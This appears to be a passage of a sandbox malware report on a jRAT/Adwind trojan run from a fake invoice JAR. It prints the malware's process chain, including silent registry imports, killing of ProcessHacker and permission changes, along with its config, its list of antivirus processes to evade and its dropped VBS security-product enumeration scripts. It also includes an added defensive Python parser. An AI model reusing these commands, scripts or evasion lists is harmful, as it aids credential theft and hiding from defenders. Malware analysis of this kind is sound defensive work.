          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\concrt140.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cplJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-string-l1-1-0.dllJump to dropped file
          Source: C:\Windows\SysWOW64\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: java.exe, 0000000A.00000002.592979586.0000000009E5B000.00000004.00000001.sdmp | Binary or memory string: VMWARE;|
Source: java.exe, 0000000A.00000002.589242015.0000000004690000.00000004.00000001.sdmp | Binary or memory string: {"NETWORK":[{"PORT":7777,"DNS":"127.0.0.1"}],"INSTALL":false,"MODULE_PATH":"zS/lq/BTk.GI","PLUGIN_FOLDER":"DdWDtpinxpf","JRE_FOLDER":"HSIROD","JAR_FOLDER":"fUTkALeaTxM","JAR_EXTENSION":"Vybgol","ENCRYPT_KEY":"cPFjgddXIBcXBCIseEuXTZjwi","DELAY_INSTALL":2,"NICKNAME":"User","VMWARE":false,"PLUGIN_EXTENSION":"DhjWU","WEBSITE_PROJECT":"https://jrat.io","JAR_NAME":"uiylKSALYJr","JAR_REGISTRY":"WLyQyhWoosi","DELAY_CONNECT":2,"VBOX":false}
Source: java.exe, 00000002.00000002.336190557.00000000155D0000.00000002.00000001.sdmp, wscript.exe, 00000005.00000002.375981336.00000000061D0000.00000002.00000001.sdmp, javaw.exe, 00000009.00000002.599666578.0000000015B70000.00000002.00000001.sdmp, java.exe, 0000000A.00000002.595530638.0000000014E10000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: java.exe, 00000002.00000002.332031373.0000000002B40000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.588443966.0000000002520000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.588652984.00000000024B0000.00000004.00000001.sdmp | Binary or memory string: ,java/lang/VirtualMachineError
Source: java.exe, 00000002.00000002.332031373.0000000002B40000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.588443966.0000000002520000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.588652984.00000000024B0000.00000004.00000001.sdmp | Binary or memory string: |[Ljava/lang/VirtualMachineError;
Source: java.exe, 0000000A.00000002.590033578.0000000004813000.00000004.00000001.sdmp | Binary or memory string: VMWARE
Source: java.exe, 0000000A.00000002.590033578.0000000004813000.00000004.00000001.sdmp | Binary or memory string: VMWARE+
Source: java.exe, 00000002.00000002.336190557.00000000155D0000.00000002.00000001.sdmp, wscript.exe, 00000005.00000002.375981336.00000000061D0000.00000002.00000001.sdmp, javaw.exe, 00000009.00000002.599666578.0000000015B70000.00000002.00000001.sdmp, java.exe, 0000000A.00000002.595530638.0000000014E10000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: java.exe, 00000002.00000002.336190557.00000000155D0000.00000002.00000001.sdmp, wscript.exe, 00000005.00000002.375981336.00000000061D0000.00000002.00000001.sdmp, javaw.exe, 00000009.00000002.599666578.0000000015B70000.00000002.00000001.sdmp, java.exe, 0000000A.00000002.595530638.0000000014E10000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: javaw.exe, 00000009.00000003.427734710.0000000015002000.00000004.00000001.sdmp | Binary or memory string: C:\Program Files (x86)\VMware\VMware Tools
Source: java.exe, 00000002.00000002.336190557.00000000155D0000.00000002.00000001.sdmp, wscript.exe, 00000005.00000002.375981336.00000000061D0000.00000002.00000001.sdmp, javaw.exe, 00000009.00000002.599666578.0000000015B70000.00000002.00000001.sdmp, java.exe, 0000000A.00000002.595530638.0000000014E10000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\taskkill.exe | Process token adjusted: Debug
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Memory protected: page read and write | page guard
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\Invoice PDF.jar'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\bgddtomvyl.js
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\regedit.exe 'regedit.exe' 'C:\Users\user\AppData\Local\Temp\ebgeaegdbdecaedfebace.reg'
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe' -jar 'C:\Users\user\AppData\Roaming\jhxromh.txt'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -jar C:\Users\user\AppData\Local\Temp\_0.5473048333189129536838706564981496.class
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process created: C:\Windows\SysWOW64\xcopy.exe xcopy 'C:\Program Files (x86)\Java\jre1.8.0_211' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\GYcBDbnJPA3276512531836276281.reg
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process created: unknown unknown
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe | Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
Source: C:\Windows\SysWOW64\cmd.exe | Process created: unknown unknown
Source: javaw.exe, 00000009.00000002.593505828.000000000A358000.00000004.00000001.sdmp | Binary or memory string: {"ACTIVE_WINDOW":"Program Manager","COMMAND":5}e","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\jhxromh.txt","VBOX":true,"RAM":"8.0 GB"}cc.exe","psview.exe","quamgr.exe","quamgr.exe","sc
Source: javaw.exe, 00000009.00000002.590078490.0000000004BEE000.00000004.00000001.sdmp | Binary or memory string: F{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: javaw.exe, 00000009.00000002.590078490.0000000004BEE000.00000004.00000001.sdmp | Binary or memory string: Program Manager
Source: javaw.exe, 00000009.00000002.588380714.0000000001110000.00000002.00000001.sdmp, java.exe, 0000000A.00000002.588591333.00000000010A0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: javaw.exe, 00000009.00000002.588380714.0000000001110000.00000002.00000001.sdmp, java.exe, 0000000A.00000002.588591333.00000000010A0000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: javaw.exe, 00000009.00000002.593505828.000000000A358000.00000004.00000001.sdmp | Binary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}e","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\jhxromh.txt","VBOX":true,"RAM":"8.0 GB"}"],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShieldCCC.exe","MCShieldRTM.exe","MCShieldDS.exe","MCS-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","Forx
Source: javaw.exe, 00000009.00000002.588380714.0000000001110000.00000002.00000001.sdmp, java.exe, 0000000A.00000002.588591333.00000000010A0000.00000002.00000001.sdmp | Binary or memory string: &Program Manager
Source: javaw.exe, 00000009.00000002.590078490.0000000004BEE000.00000004.00000001.sdmp | Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: javaw.exe, 00000009.00000002.588380714.0000000001110000.00000002.00000001.sdmp, java.exe, 0000000A.00000002.588591333.00000000010A0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: javaw.exe, 00000009.00000002.593505828.000000000A358000.00000004.00000001.sdmp | Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}e","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\jhxromh.txt","VBOX":true,"RAM":"8.0 GB"}"],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShieldCCC.exe","MCShieldRTM.exe","MCShieldDS.exe","MCS-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","For
Source: javaw.exe, 00000009.00000002.590078490.0000000004BEE000.00000004.00000001.sdmp | Binary or memory string: "{"ACTIVE_WINDOW":"Program Manager"
Source: javaw.exe, 00000009.00000002.590078490.0000000004BEE000.00000004.00000001.sdmp | Binary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: javaw.exe, 00000009.00000002.589280464.0000000004A22000.00000004.00000001.sdmp | Binary or memory string: Program Manager?<
Source: javaw.exe, 00000009.00000002.593576639.000000000A3CA000.00000004.00000001.sdmp | Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}0
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe | Code function: 2_2_02CB0380 cpuid
Source: C:\Windows\SysWOW64\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmp | Binary or memory string: EMLPROXY.EXE
Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmp | Binary or memory string: AVKService.exe
Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmp | Binary or memory string: fsgk32.exe
Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmp | Binary or memory string: AVKProxy.exe
Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmp | Binary or memory string: AVKTray.exe
Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmp | Binary or memory string: SBAMTray.exe
Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmp | Binary or memory string: K7RTScan.exe
Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmp | Binary or memory string: FSMA32.EXE
Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmp | Binary or memory string: ONLINENT.EXE
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: SCANWSCS.EXE
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: SUPERAntiSpyware.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: MsMpEng.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: K7FWSrvc.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: guardxservice.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: K7TSecurity.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: K7PSSrvc.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: MSASCui.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: cmdagent.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: acs.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: K7TSMngr.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: BullGuard.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: virusutilities.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: K7EmlPxy.EXE
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: ClamTray.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: SBAMSvc.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: procexp.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: FPAVServer.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: mbam.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: QUHLPSVC.EXE
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: FProtTray.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: ClamWin.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: op_mon.exe
          Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
          Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
          Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct
          Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct
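
The long memory strings above are fragments of the jRAT/Adwind configuration: an AV-vendor process blocklist ({"PROCESS":[...],"NAME":"..."} entries) next to settings such as SERVER_PATH, VBOX and DELAY_CONNECT, dumped with junk around them and truncated at both ends. The script below is an added example written for this page, not code from the report or from the malware. It recovers what it can from such a fragment without assuming the JSON is well formed (a quote-tracking parser is defeated by the flipped quoting in a cut fragment, so it matches entries individually instead) and then checks which recovered entries would fire against a given process list. SAMPLE is a constructed, abbreviated version of the fragments quoted above; the function names are my own.

```python
import json
import re

# Constructed sample: the config fragments quoted in the report's memory strings,
# abbreviated, truncated and with dump junk around them, as the sandbox rendered them.
SAMPLE = (
    't/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}e","FortiFW.exe",'
    '"FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},'
    '{"PROCESS":["CertReg.exe","FilMsg.exe","twsscan.exe"],"NAME":"Twister Antivirus"}],'
    '"DELAY_CONNECT":2,"SERVER_PATH":"C:\\\\Users\\\\user\\\\AppData\\\\Roaming\\\\jhxromh.txt",'
    '"VBOX":true,"RAM":"8.0 GB"}"],"NAME":"VIPRE Security 2015"},'
    '{"PROCESS":["bavhm.exe","BavSvc.exe"],"NAME":"Baidu Antivirus 2015"},'
    '{"PROCESS":["SDScan.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"}'
)

# One blocklist entry: {"PROCESS":["a.exe","b.exe"],"NAME":"Vendor"}. The head is
# optional so an entry whose start was cut off by the dump boundary is still
# recovered (and flagged as partial). Process names may not contain quotes,
# brackets or braces, which keeps stray '}' from the surrounding junk out of the
# list; an entry whose process list is unrecoverable (VIPRE above) is dropped.
ENTRY = re.compile(
    r'(?P<head>\{"PROCESS":\[)?'
    r'(?P<procs>(?:"[^"\]\[{}]+",?)+)'
    r'\],"NAME":"(?P<name>[^"]*)"\}'
)
NAME_IN_LIST = re.compile(r'"([^"]+)"')

SCALARS = {
    "SERVER_PATH": re.compile(r'"SERVER_PATH":"((?:[^"\\]|\\.)*)"'),
    "VBOX": re.compile(r'"VBOX":(true|false)'),
    "DELAY_CONNECT": re.compile(r'"DELAY_CONNECT":(\d+)'),
}


def extract_blocklist(dump):
    """Return [(product_name, [process, ...], partial)] for every entry found."""
    entries = []
    for m in ENTRY.finditer(dump):
        procs = NAME_IN_LIST.findall(m.group("procs"))
        entries.append((m.group("name"), procs, m.group("head") is None))
    return entries


def extract_scalars(dump):
    """Pull the scalar settings visible in the report. The path is JSON-decoded
    so the escaped backslashes come out as single ones."""
    out = {}
    m = SCALARS["SERVER_PATH"].search(dump)
    if m:
        out["SERVER_PATH"] = json.loads('"' + m.group(1) + '"')
    m = SCALARS["VBOX"].search(dump)
    if m:
        out["VBOX"] = m.group(1) == "true"
    m = SCALARS["DELAY_CONNECT"].search(dump)
    if m:
        out["DELAY_CONNECT"] = int(m.group(1))
    return out


def products_that_would_fire(entries, running):
    """Names of blocklisted products the RAT would notice on a host whose process
    list is `running` (compared case-insensitively, as Windows image names are)."""
    live = {p.lower() for p in running}
    return sorted(name for name, procs, _ in entries
                  if any(p.lower() in live for p in procs))


if __name__ == "__main__":
    entries = extract_blocklist(SAMPLE)
    for name, procs, partial in entries:
        print(f"{name:22} {'(partial)' if partial else '':9} {procs}")
    print(extract_scalars(SAMPLE))
    # constructed host process list
    print(products_that_would_fire(entries, ["explorer.exe", "sdtray.exe"]))
```

On the constructed sample this yields four entries (FortiClient flagged partial, its vendor head lost to the cut), the SERVER_PATH from the report, VBOX true and DELAY_CONNECT 2; the VIPRE entry is dropped because its process list did not survive the dump. The same approach works on strings pulled from a full minidump with `strings`, since it never relies on the surrounding JSON being intact.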

          Stealing of Sensitive Information:

          Yara detected AdWind RAT
          Source: Yara match; File source: Process Memory Space: java.exe PID: 4596, type: MEMORY
          Yara detected AdWind RATs dll
          Source: Yara match; File source: C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll, type: DROPPED
          Source: Yara match; File source: 10.2.java.exe.4881274.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 9.2.javaw.exe.740d0000.8.unpack, type: UNPACKEDPE
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality:

          Detected ADWIND Rat
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe: Dropped file:
              Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
              Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")
              For Each objItem in colItems
                  With objItem
                      WScript.Echo "{""AV"":""" & .displayName & """}"
                  End With
              Next
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe: Dropped file:
              Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
              Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")
              For Each objItem in colItems
                  With objItem
                      WScript.Echo "{""FIREWALL"":""" & .displayName & """}"
                  End With
              Next
